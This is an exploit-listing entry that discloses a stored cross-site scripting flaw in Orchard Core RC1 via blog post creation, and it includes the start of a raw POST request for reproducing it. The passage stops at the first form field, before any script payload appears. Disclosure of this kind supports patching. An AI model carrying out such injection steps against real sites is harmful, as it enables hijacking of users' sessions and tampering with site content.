Exploits / Vulnerability Discovered : 2020-05-12 |
Type : webapps |
Platform : aspx
This exploit / vulnerability Orchard core rc1 persistent crosssite scripting is for educational purposes only and if it is used you will do on your own risk!
###Describe the bug
Persistent Cross-site scripting (Stored XSS) vulnerabilities in Orchard CMS - Orchard Core RC1 allow remote attackers to inject arbitrary web script or HTML
via create or edit blog content.
###To Reproduce
Steps to reproduce the behavior:
POST /Admin/Contents/ContentTypes/BlogPost/Create HTTP/1.1
-----------------------------31063090348194141451329743365
Content-Disposition: form-data; name="ListPart.ContainerId"